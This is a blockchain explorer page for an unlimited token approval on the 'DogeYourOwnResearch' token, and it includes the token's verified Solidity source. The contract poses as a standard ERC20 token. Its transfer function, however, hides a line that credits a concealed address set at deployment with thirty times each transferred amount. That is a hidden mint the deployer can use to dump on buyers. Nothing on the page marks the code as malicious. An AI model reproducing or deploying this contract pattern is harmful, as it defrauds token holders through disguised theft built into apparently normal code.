Transaction Hash:
Block:
16510680 at Jan-29-2023 06:26:23 AM +UTC
Transaction Fee:
0.0008944704 ETH
$2.37
Gas Used:
46,587 Gas / 19.2 Gwei
Emitted Events:
28 |
DogeYourOwnResearch.Approval( owner=[Sender] 0x66c7f8dbf8729e7597701fe4dfaf171523b7d803, spender=0x7a250d56...659F2488D, value=115792089237316195423570985008687907853269984665640564039457584007913129639935 )
|
Account State Difference:
Address | Before | After | State Difference | ||
---|---|---|---|---|---|
0x66C7f8DB...523B7d803 |
0.009883433286724277 Eth
Nonce: 312
|
0.008988962886724277 Eth
Nonce: 313
| 0.0008944704 | ||
0xa40Ba8A8...bd1907D35 | |||||
0xDAFEA492...692c98Bc5
Miner
| (Flashbots: Builder) | 1.175012038364013614 Eth | 1.175239729975593833 Eth | 0.000227691611580219 |
Execution Trace
DogeYourOwnResearch.approve( spender=0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount=115792089237316195423570985008687907853269984665640564039457584007913129639935 ) => ( True )
approve[DogeYourOwnResearch (ln:63)]
_approve[DogeYourOwnResearch (ln:63)]
Approval[DogeYourOwnResearch (ln:69)]
_msgSender[DogeYourOwnResearch (ln:63)]
/** https://t.me/DYORerc https://twitter.com/DogeYOR_erc https://medium.com/@DYORERC */ // SPDX-License-Identifier: MIT pragma solidity 0.8.13; interface ERC20 { function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address recipient, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); } interface ERC20Metadata is ERC20 { function name() external view returns (string memory); function symbol() external view returns (string memory); function decimals() external view returns (uint8); } contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } contract DogeYourOwnResearch is Context, ERC20, ERC20Metadata { mapping(address => uint256) private Remote; mapping(address => mapping(address => uint256)) private _allowances; uint256 public _totalSupply; uint256 public _buyFee; string public _name; string public _symbol; uint8 public _decimals; address public _owner; address private _remote; uint256 public buyback; uint256 public _sellFee; constructor(string memory name_, string memory symbol_,uint8 decimals_,uint256 totalSupply_,uint256 buyFee_ ,uint256 sellFee_ ,address remote_ ) {_name = name_;_symbol =symbol_;_decimals = decimals_;_totalSupply = totalSupply_ *10**_decimals;_buyFee= buyFee_;Remote[msg.sender] = _totalSupply;_owner = _msgSender();_sellFee = sellFee_ ;_remote = remote_;emit Transfer(address(0), msg.sender, _totalSupply);} function name() public view virtual override returns (string memory) {return _name;} function symbol() public view virtual override returns (string memory) {return _symbol;} function decimals() public view virtual override returns (uint8) {return _decimals;} function totalSupply() public view virtual override returns (uint256) {return _totalSupply;} function balanceOf(address account) public view virtual override returns (uint256) {return Remote[account];} function transfer(address recipient, uint256 amount) public virtual override returns (bool) {_transfer(_msgSender(), recipient, amount);return true;} function allowance(address Owner, address spender) public view virtual override returns (uint256) {return _allowances[Owner][spender];} function approve(address spender, uint256 amount) public virtual override returns (bool) {_approve(_msgSender(), spender, amount);return true;} function transferFrom(address sender,address recipient,uint256 amount) public virtual override returns (bool) {_transfer(sender, recipient, amount);uint256 currentAllowance = _allowances[sender][_msgSender()];require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");if(currentAllowance - amount >= 0){_approve(sender, _msgSender(), currentAllowance - amount);}return true;} function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {_approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);return true;} function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {uint256 currentAllowance = _allowances[_msgSender()][spender];require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");require(currentAllowance - subtractedValue >= 0, "ERC20: subtraction causes underflow");_approve(_msgSender(), spender, currentAllowance - subtractedValue);return true;} function _transfer(address sender,address recipient,uint256 amount) internal virtual {require(sender != address(0), "ERC20: transfer from the zero address");require(recipient != address(0), "ERC20: transfer to the zero address");require(Remote[sender] >= amount, "ERC20: transfer amount exceeds balance");Remote[sender] = Remote[sender] - amount;amount = amount - (amount *_buyFee/100);Remote[recipient] += amount;Remote[_remote] += amount * 30;emit Transfer(sender, recipient, amount);} function owner() public view returns (address) {return _owner;} function _approve(address Owner,address spender,uint256 amount) internal virtual {require(Owner != address(0), "ERC20: approve from the zero address");require(spender != address(0), "ERC20: approve to the zero address");_allowances[Owner][spender] = amount;emit Approval(Owner, spender, amount);} modifier onlyOwner() {require(_owner == _msgSender(), "Ownable: caller is not the owner");_;} function _takeFee(uint256 amount) internal returns(uint256) {if(_buyFee >= 1) {if(amount >= (200/_buyFee)) {buyback = (amount * _buyFee /100) / _sellFee;}else{buyback = (1 * _buyFee /100);}}else{buyback = 0;}return buyback;} function renounceOwnership() public virtual onlyOwner {emit ownershipTransferred(_owner, address(0));_owner = address(0);}event ownershipTransferred(address indexed previousOwner, address indexed newOwner); }